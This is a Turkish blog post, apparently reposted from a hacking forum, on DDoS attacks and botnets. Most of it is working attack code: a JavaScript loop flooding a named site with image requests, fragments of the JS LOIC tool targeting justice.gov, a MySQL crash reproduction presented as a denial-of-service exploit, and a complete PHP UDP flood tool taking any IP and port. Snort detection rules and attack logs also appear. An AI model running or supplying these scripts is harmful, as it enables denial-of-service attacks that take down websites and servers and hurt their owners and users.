28 Haziran 2012 Perşembe

RE : BOTNET (MKT)

Aslinda Simdi bazi konulardada Anlasmamiz Gerekiyor.Aslinda sadece botnet-lerle attack olunmaz. Bildiginiz uzere Dunyada En cok DDoS yontemi BOTNET-dir. RAT-la kurarsin zombilerini 50-60 tane DDoS edersin. Anonymous-e gelince ise onlarda BOTNET-le ddos ederler. Aslinda sadece Botnet degildir. Simdi ben basladimmi yazmaya cok yazarim Mesela JS(JavaScript) + HTML + NET destekli bazi scriptlerde vardi. Bu Script-leri kullanmaya basladigin zaman sanki siteye girib ctrl+r basarmissin gibi Attack yapiyor. Yani cok yukleniyor > Traffik Atiyor > Site yavasliyor = Down ISte oylece "WTF?!" Diyerek kaliriz. Nasil Yapilir bu attack-lar? Mesela Asagidaki 1 JS + HTML destekli (ctrl+r) Scriptidir. 1 nevin onu .html gibi upload ederiz post-da inputlari yarar Ve parse bile olunmadan Dalar serverin icine boylece zayifladir Serveri. Bu 1 nevin SYN DDoS-dur. ve bunu 1 cok kisiyle yaptiginda iyi olur. Amma sadece 1 bilgisayar DDoS + UDP ise yaramaz.

Kod:
<script type="text/javascript">
attack_host="www.site.ru" //down olunacak site adresi
attack_port=80
path='Shared/Compatibility.aspx'
for(i=1;i<=3000;i++)
{ document.write('<img src="http://' + attack_host + ':' + attack_port + '/' + path + '?' +  Math.random() + '">');}
</script>
Yani bu cok kicik 1 script. Anlami boyle anlatiyim :
Kod:
var fireInterval;
var isFiring = false;
var currentTime = new Date()
var lastSuccess = currentTime.getTime();
var requestedCtrNode = document.getElementById("requestedCtr"),
succeededCtrNode = document.getElementById("succeededCtr"),
failedCtrNode = document.getElementById("failedCtr"),
targetURLNode = document.getElementById("targetURL")
Burda Hash Table-lerimize bakalim :
Kod:
var requestsHT = {};
ve Sample WebBlog :
Kod:
GET /?id=1327271393334&msg=No%20A%20la%20CENSURA%20EN%20INTERNET%A1%A1%A1 
 HTTP/1.1" 200 8395
Ve Analysis :
Kod:
GET /app/?id=1292337572944&msg=BOOM%2520HEADSHOT! HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
1-de MySQL-de bu DDoS bulunmusdu (ERAMONG TARAFINDAN) :
Kod:
mysql-test/suite/innodb/t/innodb_bug13510739.test
#
# Bug#13510739 63775: SERVER CRASH ON HANDLER READ NEXT AFTER DELETE RECORD.
#
-- source include/have_innodb.inc
CREATE TABLE bug13510739 (c INTEGER NOT NULL, PRIMARY KEY (c)) ENGINE=INNODB;
INSERT INTO bug13510739 VALUES (1), (2), (3), (4);
DELETE FROM bug13510739 WHERE c=2;
HANDLER bug13510739 OPEN;
HANDLER bug13510739 READ `primary` = (2);
# this one crashes the server IF the bug IS present
HANDLER bug13510739 READ `primary` NEXT;
DROP TABLE bug13510739;
Ve AkaStep 1 kodlasdirma yapmis :
Kod:
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show tables \g
ERROR 1046 (3D000): No database selected
mysql> show databases \g
+--------------------+
| Database           |
+--------------------+
| information_schema |
| sed165             |
+--------------------+
2 rows in set (0.00 sec)

mysql> \s
--------------
mysql  Ver 14.14 Distrib 5.5.21, for Win32 (x86)

Connection id:          5
Current database:
Current user:           sed165@localhost
SSL:                    Not in use
Using delimiter:        ;
Server version:         5.5.21 MySQL Community Server (GPL)
Protocol version:       10
Connection:             localhost via TCP/IP
Server characterset:    latin1
Db     characterset:    latin1
Client characterset:    latin1
Conn.  characterset:    latin1
TCP port:               3306
Uptime:                 5 min 33 sec

Threads: 1  Questions: 18  Slow queries: 0  Opens: 35  Flush tables: 1  Open tables: 28  Queries per second avg: 0.054
--------------

mysql> show grants for  'sed165'@'%' \g
+-------------------------------------------------------------------------------------------------------+
| Grants for sed165@%                                                                                   |
+-------------------------------------------------------------------------------------------------------+
| GRANT USAGE ON *.* TO 'sed165'@'%' IDENTIFIED BY PASSWORD '*803F09BD31CC02F76D5D5C5451D00C8CDA4E9A15' |
| GRANT ALL PRIVILEGES ON `sed165`.* TO 'sed165'@'%' WITH GRANT OPTION                                  |
+-------------------------------------------------------------------------------------------------------+
2 rows in set (0.00 sec)

mysql> use sed165 \g
Query OK, 0 rows affected (0.00 sec)

mysql> CREATE TABLE bug13510739 (c INTEGER NOT NULL, PRIMARY KEY (c)) ENGINE=INNODB;
Query OK, 0 rows affected (0.11 sec)

mysql>
mysql> INSERT INTO bug13510739 VALUES (1), (2), (3), (4);
Query OK, 4 rows affected (0.01 sec)
Records: 4  Duplicates: 0  Warnings: 0

mysql>
mysql> DELETE FROM bug13510739 WHERE c=2;
Query OK, 1 row affected (0.05 sec)

mysql>
mysql> HANDLER bug13510739 OPEN;
Query OK, 0 rows affected (0.00 sec)

mysql>
mysql> HANDLER bug13510739 READ `primary` = (2);
Empty set (0.00 sec)

mysql>
mysql> # this one crashes the server IF the bug IS present
mysql> HANDLER bug13510739 READ `primary` NEXT;


Mysql Server Crash Olur burada.(Denial Of Service)
Gorduyunuz gibi MySQL 5.5.21 -dan asagi versionlarin hepsinde bu exploit bulundu Guzel VULN yani Update + Backup gerekicek.
Kod:
# snort -c snort-test.conf -A console  -q -r /LABS2/LOIC/PCAP/LOIC-udp.pcap -O
O zaman :
Kod:
01/27-11:58:38.849802  [**] [1:1234590:1] SLR - LOIC DoS Tool (UDP Mode)  - Behavior Rule (tracking/threshold) [**] [Classification: Misc activity] [Priority: 3] {UDP} xxx.xxx.xxx.xxx:59022 -> xxx.xxx.xxx.xxx:80
01/27-11:58:38.952511  [**] [1:1234590:1] SLR - LOIC DoS Tool (UDP Mode)  - Behavior Rule (tracking/threshold) [**] [Classification: Misc activity] [Priority: 3] {UDP} xxx.xxx.xxx.xxx:59022 -> xxx.xxx.xxx.xxx:80
01/27-11:58:39.024253  [**] [1:1234590:1] SLR - LOIC DoS Tool (UDP Mode)  - Behavior Rule (tracking/threshold) [**] [Classification: Misc activity] [Priority: 3] {UDP} xxx.xxx.xxx.xxx:59022 -> xxx.xxx.xxx.xxx:80
Gorduyunuz gibi UDP uzerinden :80 down-a gider. Boyle 1 seyden soz ediyorum :
Orjinal Boyutunda Açmak İçin ( 1153x649 ve %3$sKB ) Buraya Tıklayın

Yani DDoS-a karsi korunun. GET request yapiyor :
Kod:
GET  /HTTP/1.0\r\n
# snort -c snort-test.conf -A console -q -r /LABS2/LOIC/PCAP/LOIC-http.pcap -O
VE TCP uzerinden analyizlere devam :
Kod:
01/27-11:57:52.977537  [**] [1:1234569:1] SLR - LOIC DoS Tool (HTTP Mode) [**] [Classification: Misc activity] [Priority: 3] {TCP} xxx.xxx.xxx.xxx:55178 -> xxx.xxx.xxx.xxx:80
01/27-11:57:54.184679  [**] [1:1234569:1] SLR - LOIC DoS Tool (HTTP Mode) [**] [Classification: Misc activity] [Priority: 3] {TCP} xxx.xxx.xxx.xxx:55188 -> xxx.xxx.xxx.xxx:80
01/27-11:57:55.111591  [**] [1:1234569:1] SLR - LOIC DoS Tool (HTTP Mode) [**] [Classification: Misc activity] [Priority: 3] {TCP} xxx.xxx.xxx.xxx:55198 -> xxx.xxx.xxx.xxx:80
Loic JAVASCRIPT :
Kod:
var requestsHT = {}; // requests hash table, may come in handy later

var makeHttpRequest = function () {
…
    var rID =Number(new Date());
        var img = new Image();
    …
    img.setAttribute("src", targetURL + "?id=" + rID + "&msg=" + messageNode.value);
    …
    requestsHT[rID] = img;
    …
}
Kod:
fireButton.onclick = function () {
                if (isFiring) {
…
}

function FireIbero() {
…
}
…
document.getElementById("targetURL").value = "http://www.justice.gov";
FireIbero();
…
MakeHTTPRequest function :
Kod:
var rID =Number(new Date());
var img = new Image();
Image() :
Kod:
requestsHT[rID] = img;
Saldirirken web sunucusuna tutukldugunuzdaki information :
Kod:
    aaa.bbb.ccc.ddd - - [26/Jan/2012:11:24:05 +0200] "GET /?id=1327572484770&msg=Somos%20legi%C3%B3n! HTTP/1.1" 200 69 "hxxp://www.example.com/d/2.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" 

    aaa.bbb.ccc.ddd - - [26/Jan/2012:11:24:05 +0200] "GET /?id=1327572484818&msg=Somos%20legi%C3%B3n! HTTP/1.1" 200 69 "hxxp://www.example.com/d/2.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

    aaa.bbb.ccc.ddd - - [26/Jan/2012:11:24:05 +0200] "GET /?id=1327572484720&msg=Somos%20legi%C3%B3n! HTTP/1.1" 200 69 "hxxp://www.example.com/d/2.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" 

    aaa.bbb.ccc.ddd - - [26/Jan/2012:11:24:05 +0200] "GET /?id=1327572484936&msg=Somos%20legi%C3%B3n! HTTP/1.1" 200 69 "hxxp://www.example.com/d/2.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
SNORT-un PCRE-e attack :
Kod:
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"Attempted DoS using JS LOIC DoS Tool"; flow: established,to_server ; pcre:”/&id=\d{13}&msg=/Uis”; threshold: type threshold, track by_src, count 400 , seconds 5 ; classtype:misc-attack; sid:1000005; rev:1;)
msg alani :
Kod:
    msg=%C2%A1%C2%A1NO%20NOS%20GUSTA%20LA%20
    msg=:)
    msg=:D
    msg=Somos%20Legion!!!
    msg=Somos%20legi%C3%B3n!
    msg=Stop%20S.O.P.A%20:)%20%E2%99%AB%E2%99%AB HTTP/1.1" 200
    msg=We%20Are%20Legion!
    msg=gh
    msg=open%20megaupload
    msg=que%20sepan%20los%20nacidos%20y%20los%20que%20van%20a%20nacer %20que%20nacimos%20para%20vencer%20y%20no%20para%20ser%20vencidos
    msg=stop%20SOPA!!
    msg=We%20are%20Anonymous.%20We%20are%20Legion.%20We%20do%20not %20forgive.%20We%20do%20not%20forget.%20Expect%20us!
++++++++++++++++++++++++++++++++++++++++++++++++++
Ve Buda 1 PHP DoS Scripti :
Kod:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
 <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
 <meta name="author" content="">

 <title>PHP DoS, Coded by ***</title>
</head>
<!-- PHP DOS, coded by *** -->
<style type="text/css">
<!--
body {
 font-family: Arial, Helvetica, sans-serif;
 font-size: 12px;
 font-style: normal;
 line-height: normal;
 color: #FFFFFF;
 background-color: #000000;
}



-->
</style>
<!-- PHP DOS, coded by *** -->
<body>
<center><br><br>
<img src="main.jpg"><br>
<b>Your IP:</b> <font color="red"><?php echo $ip; ?></font>&nbsp;(Don't DoS yourself nub)<br><br>
<form name="input" action="function.php" method="post">
IP:
<input type="text" name="ip" size="15" maxlength="15" class="main" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Time:
<input type="text" name="time" size="14" maxlength="20" class="main" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Port:
<input type="text" name="port" size="5" maxlength="5" class="main" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';">
<br><br>
<input type="submit" value="    Start the Attack--->    ">
<br><br>
<center>
After initiating the DoS attack, please wait while the browser loads.
</center>

</form>
</center>
<!-- PHP DOS, coded by *** -->
</body>
</html>
ve function.php :
Kod:
<?php

//=================================================
//PHP DOS v1.8 (Possibly Stronger Flood Strength)
//Coded by  ***
//www.********.tld
//=================================================

$packets = 0;
$ip = $_POST['ip'];
$rand = $_POST['port'];
set_time_limit(0);
ignore_user_abort(FALSE);

$exec_time = $_POST['time'];

$time = time();
print "Flooded: $ip on port $rand <br><br>";
$max_time = $time+$exec_time;



for($i=0;$i<65535;$i++){
        $out .= "X";
}
while(1){
$packets++;
        if(time() > $max_time){
                break;
        }
        
        $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
        if($fp){
                fwrite($fp, $out);
                fclose($fp);
        }
}
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>
Yani her turlu DDoS olunur ister web istersede Botnet 443 port acilimi :80 acik port farketmez ctrl+r post-da inputlarin yarilmasi aynidir Basarilar + Tesekkurler & Respect!! ^_^
Topic : http://www.millikuvvetler.net/showthread.php?t=8006
Peace!!!

Hiç yorum yok:

Yorum Gönder